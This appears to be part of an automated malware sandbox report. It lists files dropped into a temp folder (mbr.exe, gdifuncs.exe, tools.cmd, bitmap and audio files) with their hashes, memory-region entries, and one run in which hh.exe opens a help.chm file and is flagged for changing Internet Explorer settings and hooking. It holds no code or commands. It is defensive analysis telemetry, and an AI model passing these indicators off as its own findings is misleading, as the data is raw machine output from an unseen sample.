SHA512 e3d6bf8f6ae16daa235e2bc7ce64da5a76ff0155fa89942a4e9d3f10ce70229e081c5029a6b67702a6b14000f62e6c9188ba394ee7183d0667ddac9e0224f3f3

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

MD5 b25dfa10da59f8870bfd2881424387a7
SHA1 cdd1905c01727aa0bd13dc0c2ce99e7dfb90c7c3
SHA256 07d0d55d8135b4134f359fb95066e69237ae18f78ce0348419770df44c1291e0
SHA512 d476eab8ea65e6681b4efa5de82786e5cc6a221ab068d499a90963b5de51d1284694ed119d61a903a1f19a49bf0286228d3c54eeb38fe2e5fab6b7d548331d1d

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

MD5 26ed4ff75a36f8e4eadac07f4a05b191
SHA1 2dd3b522c895abd247c6aff056c03679aac674b8
SHA256 386bfc26cd02d4444970c8cc43c9b8016a414f24f043e3059301977a046f8af5
SHA512 6a315b30f834843d57059a9c9c4c1d8d33ef2d7851da140677f0c15ed430b6b4b0a50063ab1c7d374ecc4a07b0f4a720ca7793513468e752daa89fb62d2cb9a4

C:\Users\Admin\AppData\Local\Temp\145B.tmp\tools.cmd

MD5 397c1a185b596e4d6a4a36c4bdcbd3b2
SHA1 054819dae87cee9b1783b09940a52433b63f01ae
SHA256 56c7054c00a849648d3681d08536dc56c0fb637f1f1ec3f9e102eace0a796a9f
SHA512 c2a77479ca0aa945826dccea75d5a7224c85b7b415fda802301be8a2305197276a33c48f82717faddb2a0ac58300f5b849a8c0dffb5a4443663c3dfd951d4e5c

memory/712-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\145B.tmp\bg.bmp

MD5 34de1fb7af04ee0e74d7ebde80fe6595
SHA1 65cbfc43364a00e02814915ffe5e3f0968835b98
SHA256 b656ac1b28295c04e989215a88b592693e56d918f1125f835441a47276fcb476
SHA512 2532277795ea0f107e2784ee5d601a0d34eb869d6102759a0ca20c92391e430f6ee396481f6c81998afe5c4acc2dcd54bc77fe12bd5239d069a76a1e81e0600d

C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe

MD5 e254e9598ee638c01e5ccc40e604938b
SHA1 541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
SHA256 4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
SHA512 92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mainbgtheme.wav

MD5 97e96db54c2c9def65e44613624e3ac1
SHA1 ead3b0fe0b9fc5a065271614ecf852be6159a8e8
SHA256 55422beb49541390508cd2fde7dcf052ad168ef3de4bc38b22e2ed458d2f23a6
SHA512 b16136f1493e1ef6e35993d9db514812297c564af2fb1c5e3fe05f47c24a3d6e9fbcb1785936f83db55fdac1515bd6d8bfaed311541b8d12c3e884eb67449f01

\??\c:\bg.bmp

MD5 ce45a70d3cc2941a147c09264fc1cda5
SHA1 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256 eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512 d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe

MD5 7c92316762d584133b9cabf31ab6709b
SHA1 7ad040508cef1c0fa5edf45812b7b9cd16259474
SHA256 01995c3715c30c0c292752448516b94485db51035c3a4f86eb18c147f10b6298
SHA512 f9fc7600c30cb11079185841fb15ee3ba5c33fff13979d5e69b2bae5723a0404177195d2e0bd28142356ff9b293850880b28322b2ce1ff9fe35e8961bb3f7be1

memory/1580-240-0x0000000000850000-0x0000000000872000-memory.dmp

memory/1580-241-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/1580-242-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-243-0x00000000048A0000-0x00000000048E0000-memory.dmp

C:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav

MD5 1b185a156cfc1ddeff939bf62672516b
SHA1 fd8b803400036f42c8d20ae491e2f1f040a1aed5
SHA256 e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36
SHA512 41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

memory/1580-245-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-246-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-248-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-247-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-250-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-249-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/1580-251-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-252-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-253-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-254-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-255-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-256-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-257-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-258-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-259-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-260-0x000000000BA70000-0x000000000BB70000-memory.dmp

memory/1580-261-0x000000000BA70000-0x000000000BB70000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\hh.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\hh.exe N/A
N/A N/A C:\Windows\hh.exe N/A

Processes

C:\Windows\hh.exe

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Network

N/A

Files

memory/1712-17-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp